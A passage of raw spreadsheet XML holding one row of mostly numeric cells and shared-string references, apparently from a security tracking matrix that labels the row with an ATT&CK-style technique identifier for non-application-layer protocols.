      <c r="TB26" s="184"/>
      <c r="TC26" s="184"/>
      <c r="TD26" s="184"/>
      <c r="TE26" s="184"/>
      <c r="TF26" s="184"/>
      <c r="TG26" s="184"/>
      <c r="TH26" s="184"/>
      <c r="TI26" s="184"/>
      <c r="TJ26" s="184"/>
      <c r="TK26" s="184"/>
      <c r="TL26" s="184"/>
      <c r="TM26" s="184"/>
      <c r="TN26" s="184"/>
      <c r="TO26" s="184"/>
      <c r="TP26" s="184"/>
      <c r="TQ26" s="184"/>
      <c r="TR26" s="184"/>
      <c r="TS26" s="184"/>
      <c r="TT26" s="184"/>
      <c r="TU26" s="184"/>
      <c r="TV26" s="184"/>
      <c r="TW26" s="184"/>
      <c r="TX26" s="184"/>
      <c r="TY26" s="184"/>
      <c r="TZ26" s="184"/>
      <c r="UA26" s="184"/>
      <c r="UB26" s="184"/>
      <c r="UC26" s="184"/>
      <c r="UD26" s="184"/>
      <c r="UE26" s="184"/>
      <c r="UF26" s="184"/>
      <c r="UG26" s="184"/>
      <c r="UH26" s="184"/>
      <c r="UI26" s="184"/>
      <c r="UJ26" s="184"/>
      <c r="UK26" s="184"/>
      <c r="UL26" s="184"/>
      <c r="UM26" s="184"/>
      <c r="UN26" s="184"/>
      <c r="UO26" s="184"/>
      <c r="UP26" s="184"/>
      <c r="UQ26" s="184"/>
      <c r="UR26" s="184"/>
      <c r="US26" s="184"/>
      <c r="UT26" s="184"/>
      <c r="UU26" s="184"/>
      <c r="UV26" s="184"/>
      <c r="UW26" s="184"/>
      <c r="UX26" s="184"/>
      <c r="UY26" s="184"/>
      <c r="UZ26" s="184"/>
      <c r="VA26" s="184"/>
      <c r="VB26" s="184"/>
      <c r="VC26" s="184"/>
      <c r="VD26" s="184"/>
      <c r="VE26" s="184"/>
      <c r="VF26" s="184"/>
      <c r="VG26" s="184"/>
      <c r="VH26" s="184"/>
      <c r="VI26" s="184"/>
      <c r="VJ26" s="184"/>
      <c r="VK26" s="184"/>
      <c r="VL26" s="184"/>
      <c r="VM26" s="184"/>
      <c r="VN26" s="184"/>
      <c r="VO26" s="184"/>
      <c r="VP26" s="184"/>
      <c r="VQ26" s="184"/>
      <c r="VR26" s="184"/>
      <c r="VS26" s="184"/>
      <c r="VT26" s="184"/>
      <c r="VU26" s="184"/>
      <c r="VV26" s="184"/>
      <c r="VW26" s="184"/>
      <c r="VX26" s="184"/>
      <c r="VY26" s="184"/>
    </row>
    <row r="27" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A27" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B27" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C27" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D27" s="83" t="s">
        <v>56</v>
      </c>
      <c r="E27" s="83">
        <f t="shared" si="2"/>
        <v>21</v>
      </c>
      <c r="F27" s="83" t="s">
        <v>57</v>
      </c>
      <c r="G27" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H27" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I27" s="81" t="s">
        <v>992</v>
      </c>
      <c r="J27" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K27" s="81" t="s">
        <v>993</v>
      </c>
      <c r="L27" s="81" t="s">
        <v>994</v>
      </c>
      <c r="M27" s="378" t="s">
        <v>201</v>
      </c>
      <c r="N27" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O27" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P27" s="91"/>
      <c r="Q27" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R27" s="92" t="s">
        <v>995</v>
      </c>
      <c r="S27" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T27" s="92" t="s">
        <v>996</v>
      </c>
      <c r="U27" s="94" t="s">
        <v>997</v>
      </c>
      <c r="V27" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W27" s="96" t="s">
        <v>998</v>
      </c>
      <c r="X27" s="97" t="s">
        <v>999</v>
      </c>
      <c r="Y27" s="194" t="s">
        <v>1000</v>
      </c>
      <c r="Z27" s="188" t="s">
        <v>1001</v>
      </c>
      <c r="AA27" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB27" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC27" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD27" s="83"/>
      <c r="AE27" s="83"/>
      <c r="AF27" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG27" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH27" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI27" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ27" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AK27" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL27" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM27" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN27" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO27" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP27" s="385" t="str">
        <f>M27&amp;"-frag"</f>
        <v>T1095-Non_Application_Layer-frag</v>
      </c>
      <c r="AQ27" s="358">
        <v>2</v>
      </c>
      <c r="AR27" s="100"/>
      <c r="AS27" s="100">
        <v>1</v>
      </c>
      <c r="AT27" s="100">
        <v>1</v>
      </c>
      <c r="AU27" s="100">
        <v>2</v>
      </c>
      <c r="AV27" s="92" t="s">
        <v>1002</v>
      </c>
      <c r="AW27" s="100">
        <v>1</v>
      </c>
      <c r="AX27" s="100">
        <v>1</v>
      </c>
      <c r="AY27" s="100">
        <v>1</v>
      </c>
      <c r="AZ27" s="100">
        <v>2</v>
      </c>
      <c r="BA27" s="381"/>
      <c r="BB27" s="101">
        <v>3</v>
      </c>
      <c r="BC27" s="102" t="s">
        <v>2914</v>
      </c>
      <c r="BD27" s="102">
        <v>2</v>
      </c>
      <c r="BE27" s="103" t="s">
        <v>2915</v>
      </c>
      <c r="BF27" s="103">
        <v>2</v>
      </c>
      <c r="BG27" s="104">
        <v>2</v>
      </c>
      <c r="BH27" s="105">
        <v>4</v>
      </c>
      <c r="BI27" s="106" t="s">
        <v>1847</v>
      </c>
      <c r="BJ27" s="497">
        <v>4</v>
      </c>
      <c r="BK27" s="107" t="s">
        <v>1848</v>
      </c>
      <c r="BL27" s="107">
        <v>4</v>
      </c>
      <c r="BM27" s="108">
        <v>2</v>
      </c>
      <c r="BN27" s="109">
        <v>7</v>
      </c>
      <c r="BO27" s="110" t="s">
        <v>1998</v>
      </c>
      <c r="BP27" s="501">
        <v>6</v>
      </c>
      <c r="BQ27" s="111" t="s">
        <v>1999</v>
      </c>
      <c r="BR27" s="111">
        <v>6</v>
      </c>
      <c r="BS27" s="112">
        <v>2</v>
      </c>
      <c r="BT27" s="113">
        <v>18</v>
      </c>
      <c r="BU27" s="114" t="s">
        <v>2916</v>
      </c>
      <c r="BV27" s="503">
        <v>8</v>
      </c>
      <c r="BW27" s="115" t="s">
        <v>2917</v>
      </c>
      <c r="BX27" s="115">
        <v>8</v>
      </c>
      <c r="BY27" s="116">
        <v>2</v>
      </c>
      <c r="BZ27" s="250">
        <v>12</v>
      </c>
      <c r="CA27" s="251" t="s">
        <v>2918</v>
      </c>
      <c r="CB27" s="505">
        <v>9</v>
      </c>
      <c r="CC27" s="252" t="s">
        <v>2919</v>
      </c>
      <c r="CD27" s="252">
        <v>9</v>
      </c>
      <c r="CE27" s="253">
        <v>2</v>
      </c>
      <c r="CF27" s="101">
        <v>30</v>
      </c>
      <c r="CG27" s="102" t="s">
        <v>2086</v>
      </c>
      <c r="CH27" s="102">
        <v>17</v>
      </c>
      <c r="CI27" s="103" t="s">
        <v>2087</v>
      </c>
      <c r="CJ27" s="103">
        <v>17</v>
      </c>
      <c r="CK27" s="104">
        <v>2</v>
      </c>
      <c r="CL27" s="105">
        <v>0</v>
      </c>
      <c r="CM27" s="106">
        <v>0</v>
      </c>
      <c r="CN27" s="497">
        <v>0</v>
      </c>
      <c r="CO27" s="107">
        <v>0</v>
      </c>
      <c r="CP27" s="107">
        <v>0</v>
      </c>
      <c r="CQ27" s="108">
        <v>0</v>
      </c>
      <c r="CR27" s="109">
        <v>3</v>
      </c>
      <c r="CS27" s="110" t="s">
        <v>2920</v>
      </c>
      <c r="CT27" s="501">
        <v>2</v>
      </c>
      <c r="CU27" s="111" t="s">
        <v>2921</v>
      </c>
      <c r="CV27" s="111">
        <v>2</v>
      </c>
      <c r="CW27" s="112">
        <v>1</v>
      </c>
      <c r="CX27" s="113">
        <v>10</v>
      </c>
      <c r="CY27" s="114" t="s">
        <v>2143</v>
      </c>
      <c r="CZ27" s="503">
        <v>8</v>
      </c>
      <c r="DA27" s="115" t="s">
        <v>2144</v>
      </c>
      <c r="DB27" s="115">
        <v>8</v>
      </c>
      <c r="DC27" s="116">
        <v>2</v>
      </c>
      <c r="DD27" s="101">
        <v>0</v>
      </c>
      <c r="DE27" s="102">
        <v>0</v>
      </c>
      <c r="DF27" s="102">
        <v>0</v>
      </c>
      <c r="DG27" s="103">
        <v>0</v>
      </c>
      <c r="DH27" s="103">
        <v>0</v>
      </c>
      <c r="DI27" s="104">
        <v>0</v>
      </c>
      <c r="DJ27" s="105">
        <v>1</v>
      </c>
      <c r="DK27" s="106" t="s">
        <v>2922</v>
      </c>
      <c r="DL27" s="497">
        <v>1</v>
      </c>
      <c r="DM27" s="107" t="s">
        <v>2923</v>
      </c>
      <c r="DN27" s="107">
        <v>1</v>
      </c>
      <c r="DO27" s="108">
        <v>1</v>
      </c>
      <c r="DP27" s="109">
        <v>1</v>
      </c>
      <c r="DQ27" s="110" t="s">
        <v>2922</v>
      </c>
      <c r="DR27" s="501">
        <v>1</v>
      </c>
      <c r="DS27" s="111" t="s">
        <v>2923</v>
      </c>
      <c r="DT27" s="111">
        <v>1</v>
      </c>
      <c r="DU27" s="112">
        <v>1</v>
      </c>
      <c r="DV27" s="113">
        <v>13</v>
      </c>
      <c r="DW27" s="114" t="s">
        <v>2924</v>
      </c>
      <c r="DX27" s="503">
        <v>4</v>
      </c>
      <c r="DY27" s="115" t="s">
        <v>2925</v>
      </c>
      <c r="DZ27" s="115">
        <v>4</v>
      </c>
      <c r="EA27" s="116">
        <v>1</v>
      </c>
      <c r="EB27" s="250">
        <v>2</v>
      </c>
      <c r="EC27" s="251" t="s">
        <v>2926</v>
      </c>
      <c r="ED27" s="505">
        <v>2</v>
      </c>
      <c r="EE27" s="252" t="s">
        <v>2927</v>
      </c>
      <c r="EF27" s="252">
        <v>2</v>
      </c>
      <c r="EG27" s="253">
        <v>1</v>
      </c>
      <c r="EH27" s="101">
        <v>15</v>
      </c>
      <c r="EI27" s="102" t="s">
        <v>2928</v>
      </c>
      <c r="EJ27" s="102">
        <v>6</v>
      </c>
      <c r="EK27" s="103" t="s">
        <v>2929</v>
      </c>
      <c r="EL27" s="103">
        <v>6</v>
      </c>
      <c r="EM27" s="104">
        <v>1</v>
      </c>
      <c r="EN27" s="105">
        <v>0</v>
      </c>
      <c r="EO27" s="106">
        <v>0</v>
      </c>
      <c r="EP27" s="497">
        <v>0</v>
      </c>
      <c r="EQ27" s="107">
        <v>0</v>
      </c>
      <c r="ER27" s="107">
        <v>0</v>
      </c>
      <c r="ES27" s="108">
        <v>0</v>
      </c>
      <c r="ET27" s="109">
        <v>2</v>
      </c>
      <c r="EU27" s="110" t="s">
        <v>2930</v>
      </c>
      <c r="EV27" s="501">
        <v>1</v>
      </c>
      <c r="EW27" s="111" t="s">
        <v>2931</v>
      </c>
      <c r="EX27" s="111">
        <v>1</v>
      </c>
      <c r="EY27" s="112">
        <v>1</v>
      </c>
      <c r="EZ27" s="113">
        <v>3</v>
      </c>
      <c r="FA27" s="114" t="s">
        <v>2932</v>
      </c>
      <c r="FB27" s="503">
        <v>2</v>
      </c>
      <c r="FC27" s="115" t="s">
        <v>2933</v>
      </c>
      <c r="FD27" s="115">
        <v>2</v>
      </c>
      <c r="FE27" s="116">
        <v>1</v>
      </c>
      <c r="FF27" s="101">
        <v>2</v>
      </c>
      <c r="FG27" s="102" t="s">
        <v>1798</v>
      </c>
      <c r="FH27" s="102">
        <v>1</v>
      </c>
      <c r="FI27" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ27" s="103">
        <v>1</v>
      </c>
      <c r="FK27" s="104">
        <v>1</v>
      </c>
      <c r="FL27" s="105">
        <v>2</v>
      </c>
      <c r="FM27" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="FN27" s="497">
        <v>2</v>
      </c>
      <c r="FO27" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="FP27" s="107">
        <v>2</v>
      </c>
      <c r="FQ27" s="108">
        <v>1</v>
      </c>
      <c r="FR27" s="109">
        <v>4</v>
      </c>
      <c r="FS27" s="110" t="s">
        <v>2934</v>
      </c>
      <c r="FT27" s="501">
        <v>3</v>
      </c>
      <c r="FU27" s="111" t="s">
        <v>2935</v>
      </c>
      <c r="FV27" s="111">
        <v>3</v>
      </c>
      <c r="FW27" s="112">
        <v>2</v>
      </c>
      <c r="FX27" s="113">
        <v>3</v>
      </c>
      <c r="FY27" s="114" t="s">
        <v>2936</v>
      </c>
      <c r="FZ27" s="503">
        <v>2</v>
      </c>
      <c r="GA27" s="115" t="s">
        <v>2937</v>
      </c>
      <c r="GB27" s="115">
        <v>2</v>
      </c>
      <c r="GC27" s="116">
        <v>2</v>
      </c>
      <c r="GD27" s="250">
        <v>9</v>
      </c>
      <c r="GE27" s="251" t="s">
        <v>2938</v>
      </c>
      <c r="GF27" s="505">
        <v>6</v>
      </c>
      <c r="GG27" s="252" t="s">
        <v>2939</v>
      </c>
      <c r="GH27" s="252">
        <v>6</v>
      </c>
      <c r="GI27" s="253">
        <v>1</v>
      </c>
      <c r="GJ27" s="101">
        <v>12</v>
      </c>
      <c r="GK27" s="102" t="s">
        <v>2940</v>
      </c>
      <c r="GL27" s="102">
        <v>8</v>
      </c>
      <c r="GM27" s="103" t="s">
        <v>2941</v>
      </c>
      <c r="GN27" s="103">
        <v>8</v>
      </c>
      <c r="GO27" s="104">
        <v>2</v>
      </c>
      <c r="GP27" s="105">
        <v>0</v>
      </c>
      <c r="GQ27" s="106">
        <v>0</v>
      </c>
      <c r="GR27" s="497">
        <v>0</v>
      </c>
      <c r="GS27" s="107">
        <v>0</v>
      </c>
      <c r="GT27" s="107">
        <v>0</v>
      </c>
      <c r="GU27" s="108">
        <v>0</v>
      </c>
      <c r="GV27" s="109">
        <v>1</v>
      </c>
      <c r="GW27" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="GX27" s="501">
        <v>1</v>
      </c>
      <c r="GY27" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="GZ27" s="111">
        <v>1</v>
      </c>
      <c r="HA27" s="112">
        <v>1</v>
      </c>
      <c r="HB27" s="113">
        <v>5</v>
      </c>
      <c r="HC27" s="114" t="s">
        <v>2942</v>
      </c>
      <c r="HD27" s="503">
        <v>4</v>
      </c>
      <c r="HE27" s="115" t="s">
        <v>2943</v>
      </c>
      <c r="HF27" s="115">
        <v>4</v>
      </c>
      <c r="HG27" s="116">
        <v>2</v>
      </c>
      <c r="HH27" s="101">
        <v>1</v>
      </c>
      <c r="HI27" s="102" t="s">
        <v>1799</v>
      </c>
      <c r="HJ27" s="102">
        <v>1</v>
      </c>
      <c r="HK27" s="103" t="s">
        <v>1800</v>
      </c>
      <c r="HL27" s="103">
        <v>1</v>
      </c>
      <c r="HM27" s="104">
        <v>1</v>
      </c>
      <c r="HN27" s="105">
        <v>1</v>
      </c>
      <c r="HO27" s="106" t="s">
        <v>2944</v>
      </c>
      <c r="HP27" s="497">
        <v>1</v>
      </c>
      <c r="HQ27" s="107" t="s">
        <v>2945</v>
      </c>
      <c r="HR27" s="107">
        <v>1</v>
      </c>
      <c r="HS27" s="108">
        <v>1</v>
      </c>
      <c r="HT27" s="109">
        <v>2</v>
      </c>
      <c r="HU27" s="110" t="s">
        <v>2946</v>
      </c>
      <c r="HV27" s="501">
        <v>2</v>
      </c>
      <c r="HW27" s="111" t="s">
        <v>2947</v>
      </c>
      <c r="HX27" s="111">
        <v>2</v>
      </c>
      <c r="HY27" s="112">
        <v>2</v>
      </c>
      <c r="HZ27" s="113">
        <v>2</v>
      </c>
      <c r="IA27" s="114" t="s">
        <v>2948</v>
      </c>
      <c r="IB27" s="503">
        <v>2</v>
      </c>
      <c r="IC27" s="115" t="s">
        <v>2949</v>
      </c>
      <c r="ID27" s="115">
        <v>2</v>
      </c>
      <c r="IE27" s="116">
        <v>1</v>
      </c>
      <c r="IF27" s="250">
        <v>1</v>
      </c>
      <c r="IG27" s="251" t="s">
        <v>2944</v>
      </c>
      <c r="IH27" s="505">
        <v>1</v>
      </c>
      <c r="II27" s="252" t="s">
        <v>2945</v>
      </c>
      <c r="IJ27" s="252">
        <v>1</v>
      </c>
      <c r="IK27" s="253">
        <v>1</v>
      </c>
      <c r="IL27" s="101">
        <v>3</v>
      </c>
      <c r="IM27" s="102" t="s">
        <v>2950</v>
      </c>
      <c r="IN27" s="102">
        <v>3</v>
      </c>
      <c r="IO27" s="103" t="s">
        <v>2951</v>
      </c>
      <c r="IP27" s="103">
        <v>3</v>
      </c>
      <c r="IQ27" s="104">
        <v>2</v>
      </c>
      <c r="IR27" s="105">
        <v>0</v>
      </c>
      <c r="IS27" s="106">
        <v>0</v>
      </c>
      <c r="IT27" s="497">
        <v>0</v>
      </c>
      <c r="IU27" s="107">
        <v>0</v>
      </c>
      <c r="IV27" s="107">
        <v>0</v>
      </c>
      <c r="IW27" s="108">
        <v>0</v>
      </c>
      <c r="IX27" s="109">
        <v>0</v>
      </c>
      <c r="IY27" s="110">
        <v>0</v>
      </c>
      <c r="IZ27" s="501">
        <v>0</v>
      </c>
      <c r="JA27" s="111">
        <v>0</v>
      </c>
      <c r="JB27" s="111">
        <v>0</v>
      </c>
      <c r="JC27" s="112">
        <v>0</v>
      </c>
      <c r="JD27" s="113">
        <v>2</v>
      </c>
      <c r="JE27" s="114" t="s">
        <v>2946</v>
      </c>
      <c r="JF27" s="503">
        <v>2</v>
      </c>
      <c r="JG27" s="115" t="s">
        <v>2947</v>
      </c>
      <c r="JH27" s="115">
        <v>2</v>
      </c>
      <c r="JI27" s="116">
        <v>2</v>
      </c>
      <c r="JJ27" s="101">
        <v>0</v>
      </c>
      <c r="JK27" s="102">
        <v>0</v>
      </c>
      <c r="JL27" s="102">
        <v>0</v>
      </c>
      <c r="JM27" s="103">
        <v>0</v>
      </c>
      <c r="JN27" s="103">
        <v>0</v>
      </c>
      <c r="JO27" s="104">
        <v>0</v>
      </c>
      <c r="JP27" s="105">
        <v>0</v>
      </c>
      <c r="JQ27" s="106">
        <v>0</v>
      </c>
      <c r="JR27" s="497">
        <v>0</v>
      </c>
      <c r="JS27" s="107">
        <v>0</v>
      </c>
      <c r="JT27" s="107">
        <v>0</v>
      </c>
      <c r="JU27" s="108">
        <v>0</v>
      </c>
      <c r="JV27" s="109">
        <v>0</v>
      </c>
      <c r="JW27" s="110">
        <v>0</v>
      </c>
      <c r="JX27" s="501">
        <v>0</v>
      </c>
      <c r="JY27" s="111">
        <v>0</v>
      </c>
      <c r="JZ27" s="111">
        <v>0</v>
      </c>
      <c r="KA27" s="112">
        <v>0</v>
      </c>
      <c r="KB27" s="113">
        <v>0</v>
      </c>
      <c r="KC27" s="114">
        <v>0</v>
      </c>
      <c r="KD27" s="503">
        <v>0</v>
      </c>
      <c r="KE27" s="115">
        <v>0</v>
      </c>
      <c r="KF27" s="115">
        <v>0</v>
      </c>
      <c r="KG27" s="116">
        <v>0</v>
      </c>
      <c r="KH27" s="250">
        <v>0</v>
      </c>
      <c r="KI27" s="251">
        <v>0</v>
      </c>
      <c r="KJ27" s="505">
        <v>0</v>
      </c>
      <c r="KK27" s="252">
        <v>0</v>
      </c>
      <c r="KL27" s="252">
        <v>0</v>
      </c>
      <c r="KM27" s="253">
        <v>0</v>
      </c>
      <c r="KN27" s="101">
        <v>0</v>
      </c>
      <c r="KO27" s="102">
        <v>0</v>
      </c>
      <c r="KP27" s="102">
        <v>0</v>
      </c>
      <c r="KQ27" s="103">
        <v>0</v>
      </c>
      <c r="KR27" s="103">
        <v>0</v>
      </c>
      <c r="KS27" s="104">
        <v>0</v>
      </c>
      <c r="KT27" s="105">
        <v>0</v>
      </c>
      <c r="KU27" s="106">
        <v>0</v>
      </c>
      <c r="KV27" s="497">
        <v>0</v>
      </c>
      <c r="KW27" s="107">
        <v>0</v>
      </c>
      <c r="KX27" s="107">
        <v>0</v>
      </c>
      <c r="KY27" s="108">
        <v>0</v>
      </c>
      <c r="KZ27" s="109">
        <v>0</v>
      </c>
      <c r="LA27" s="110">
        <v>0</v>
      </c>
      <c r="LB27" s="501">
        <v>0</v>
      </c>
      <c r="LC27" s="111">
        <v>0</v>
      </c>
      <c r="LD27" s="111">
        <v>0</v>
      </c>
      <c r="LE27" s="112">
        <v>0</v>
      </c>
      <c r="LF27" s="113">
        <v>0</v>
      </c>
      <c r="LG27" s="114">
        <v>0</v>
      </c>
      <c r="LH27" s="503">
        <v>0</v>
      </c>
      <c r="LI27" s="115">
        <v>0</v>
      </c>
      <c r="LJ27" s="115">
        <v>0</v>
      </c>
      <c r="LK27" s="116">
        <v>0</v>
      </c>
      <c r="LL27" s="117">
        <v>4</v>
      </c>
      <c r="LM27" s="507">
        <v>3</v>
      </c>
      <c r="LN27" s="119">
        <v>1</v>
      </c>
      <c r="LO27" s="119">
        <v>1</v>
      </c>
      <c r="LP27" s="119">
        <v>2</v>
      </c>
      <c r="LQ27" s="119">
        <v>2</v>
      </c>
      <c r="LR27" s="119">
        <v>1</v>
      </c>
      <c r="LS27" s="119">
        <v>2</v>
      </c>
      <c r="LT27" s="382"/>
      <c r="LU27" s="117">
        <v>0</v>
      </c>
      <c r="LV27" s="118">
        <v>0</v>
      </c>
      <c r="LW27" s="507">
        <v>0</v>
      </c>
      <c r="LX27" s="119">
        <v>0</v>
      </c>
      <c r="LY27" s="119">
        <v>0</v>
      </c>
      <c r="LZ27" s="119">
        <v>0</v>
      </c>
      <c r="MA27" s="117">
        <v>0</v>
      </c>
      <c r="MB27" s="118">
        <v>0</v>
      </c>
      <c r="MC27" s="507">
        <v>0</v>
      </c>
      <c r="MD27" s="119">
        <v>0</v>
      </c>
      <c r="ME27" s="119">
        <v>0</v>
      </c>
      <c r="MF27" s="119">
        <v>0</v>
      </c>
      <c r="MG27" s="117">
        <v>0</v>
      </c>
      <c r="MH27" s="118">
        <v>0</v>
      </c>
      <c r="MI27" s="507">
        <v>0</v>
      </c>
      <c r="MJ27" s="119">
        <v>0</v>
      </c>
      <c r="MK27" s="119">
        <v>0</v>
      </c>
      <c r="ML27" s="119">
        <v>0</v>
      </c>
      <c r="MM27" s="117">
        <v>3</v>
      </c>
      <c r="MN27" s="118" t="s">
        <v>4190</v>
      </c>
      <c r="MO27" s="507">
        <v>2</v>
      </c>
      <c r="MP27" s="119" t="s">
        <v>2843</v>
      </c>
      <c r="MQ27" s="119">
        <v>1</v>
      </c>
      <c r="MR27" s="119">
        <v>2</v>
      </c>
      <c r="MS27" s="117">
        <v>0</v>
      </c>
      <c r="MT27" s="118">
        <v>0</v>
      </c>
      <c r="MU27" s="507">
        <v>0</v>
      </c>
      <c r="MV27" s="119">
        <v>0</v>
      </c>
      <c r="MW27" s="119">
        <v>0</v>
      </c>
      <c r="MX27" s="119">
        <v>0</v>
      </c>
      <c r="MY27" s="117">
        <v>0</v>
      </c>
      <c r="MZ27" s="118">
        <v>0</v>
      </c>
      <c r="NA27" s="507">
        <v>0</v>
      </c>
      <c r="NB27" s="119">
        <v>0</v>
      </c>
      <c r="NC27" s="119">
        <v>0</v>
      </c>
      <c r="ND27" s="119">
        <v>0</v>
      </c>
      <c r="NE27" s="117">
        <v>0</v>
      </c>
      <c r="NF27" s="118">
        <v>0</v>
      </c>
      <c r="NG27" s="507">
        <v>0</v>
      </c>
      <c r="NH27" s="119">
        <v>0</v>
      </c>
      <c r="NI27" s="119">
        <v>0</v>
      </c>
      <c r="NJ27" s="119">
        <v>0</v>
      </c>
      <c r="NK27" s="117">
        <v>1</v>
      </c>
      <c r="NL27" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM27" s="507">
        <v>1</v>
      </c>
      <c r="NN27" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO27" s="119">
        <v>1</v>
      </c>
      <c r="NP27" s="119">
        <v>1</v>
      </c>
      <c r="NQ27" s="117">
        <v>0</v>
      </c>
      <c r="NR27" s="118">
        <v>0</v>
      </c>
      <c r="NS27" s="507">
        <v>0</v>
      </c>
      <c r="NT27" s="119">
        <v>0</v>
      </c>
      <c r="NU27" s="119">
        <v>0</v>
      </c>
      <c r="NV27" s="119">
        <v>0</v>
      </c>
      <c r="NW27" s="117">
        <v>0</v>
      </c>
      <c r="NX27" s="118">
        <v>0</v>
      </c>
      <c r="NY27" s="507">
        <v>0</v>
      </c>
      <c r="NZ27" s="119">
        <v>0</v>
      </c>
      <c r="OA27" s="119">
        <v>0</v>
      </c>
      <c r="OB27" s="119">
        <v>0</v>
      </c>
      <c r="OC27" s="120">
        <v>2</v>
      </c>
      <c r="OD27" s="120">
        <v>2</v>
      </c>
      <c r="OE27" s="120">
        <v>2</v>
      </c>
      <c r="OF27" s="121">
        <v>2</v>
      </c>
      <c r="OG27" s="120">
        <v>2</v>
      </c>
      <c r="OH27" s="120">
        <v>2</v>
      </c>
      <c r="OI27" s="120">
        <v>2</v>
      </c>
      <c r="OJ27" s="120">
        <v>2</v>
      </c>
      <c r="OK27" s="383"/>
      <c r="OL27" s="120">
        <v>0</v>
      </c>
      <c r="OM27" s="120">
        <v>0</v>
      </c>
      <c r="ON27" s="120">
        <v>0</v>
      </c>
      <c r="OO27" s="189"/>
      <c r="OP27" s="189">
        <v>0</v>
      </c>
      <c r="OQ27" s="464">
        <v>0</v>
      </c>
      <c r="OR27" s="120">
        <v>0</v>
      </c>
      <c r="OS27" s="120">
        <v>0</v>
      </c>
      <c r="OT27" s="120">
        <v>0</v>
      </c>
      <c r="OU27" s="189"/>
      <c r="OV27" s="189">
        <v>0</v>
      </c>
      <c r="OW27" s="464">
        <v>0</v>
      </c>
      <c r="OX27" s="120">
        <v>0</v>
      </c>
      <c r="OY27" s="120">
        <v>0</v>
      </c>
      <c r="OZ27" s="120">
        <v>0</v>
      </c>
      <c r="PA27" s="189"/>
      <c r="PB27" s="189">
        <v>0</v>
      </c>
      <c r="PC27" s="464">
        <v>0</v>
      </c>
      <c r="PD27" s="120">
        <v>0</v>
      </c>
      <c r="PE27" s="120">
        <v>0</v>
      </c>
      <c r="PF27" s="120">
        <v>0</v>
      </c>
      <c r="PG27" s="189"/>
      <c r="PH27" s="189">
        <v>0</v>
      </c>
      <c r="PI27" s="464">
        <v>0</v>
      </c>
      <c r="PJ27" s="120">
        <v>2</v>
      </c>
      <c r="PK27" s="120">
        <v>2</v>
      </c>
      <c r="PL27" s="120">
        <v>2</v>
      </c>
      <c r="PM27" s="189" t="s">
        <v>2952</v>
      </c>
      <c r="PN27" s="189">
        <v>2</v>
      </c>
      <c r="PO27" s="464">
        <v>2</v>
      </c>
      <c r="PP27" s="120">
        <v>1</v>
      </c>
      <c r="PQ27" s="120">
        <v>1</v>
      </c>
      <c r="PR27" s="120">
        <v>1</v>
      </c>
      <c r="PS27" s="189" t="s">
        <v>2660</v>
      </c>
      <c r="PT27" s="189">
        <v>1</v>
      </c>
      <c r="PU27" s="464">
        <v>1</v>
      </c>
      <c r="PV27" s="120">
        <v>0</v>
      </c>
      <c r="PW27" s="120">
        <v>0</v>
      </c>
      <c r="PX27" s="120">
        <v>0</v>
      </c>
      <c r="PY27" s="189"/>
      <c r="PZ27" s="189">
        <v>0</v>
      </c>
      <c r="QA27" s="464">
        <v>0</v>
      </c>
      <c r="QB27" s="120">
        <v>0</v>
      </c>
      <c r="QC27" s="120">
        <v>0</v>
      </c>
      <c r="QD27" s="120">
        <v>0</v>
      </c>
      <c r="QE27" s="189"/>
      <c r="QF27" s="189">
        <v>0</v>
      </c>
      <c r="QG27" s="464">
        <v>0</v>
      </c>
      <c r="QH27" s="120">
        <v>1</v>
      </c>
      <c r="QI27" s="120">
        <v>1</v>
      </c>
      <c r="QJ27" s="120">
        <v>1</v>
      </c>
      <c r="QK27" s="189" t="s">
        <v>2542</v>
      </c>
      <c r="QL27" s="189">
        <v>1</v>
      </c>
      <c r="QM27" s="464">
        <v>1</v>
      </c>
      <c r="QN27" s="120">
        <v>0</v>
      </c>
      <c r="QO27" s="120">
        <v>0</v>
      </c>
      <c r="QP27" s="120">
        <v>0</v>
      </c>
      <c r="QQ27" s="189"/>
      <c r="QR27" s="189">
        <v>0</v>
      </c>
      <c r="QS27" s="464">
        <v>0</v>
      </c>
      <c r="QT27" s="184"/>
      <c r="QU27" s="184"/>
      <c r="QV27" s="184"/>
      <c r="QW27" s="184"/>
      <c r="QX27" s="184"/>
      <c r="QY27" s="184"/>
      <c r="QZ27" s="184"/>
      <c r="RA27" s="184"/>
      <c r="RB27" s="184"/>
      <c r="RC27" s="184"/>
      <c r="RD27" s="184"/>
      <c r="RE27" s="184"/>
      <c r="RF27" s="184"/>
      <c r="RG27" s="184"/>
      <c r="RH27" s="184"/>
      <c r="RI27" s="184"/>
      <c r="RJ27" s="184"/>
      <c r="RK27" s="184"/>
      <c r="RL27" s="184"/>
      <c r="RM27" s="184"/>
      <c r="RN27" s="184"/>
      <c r="RO27" s="184"/>
      <c r="RP27" s="184"/>
      <c r="RQ27" s="184"/>
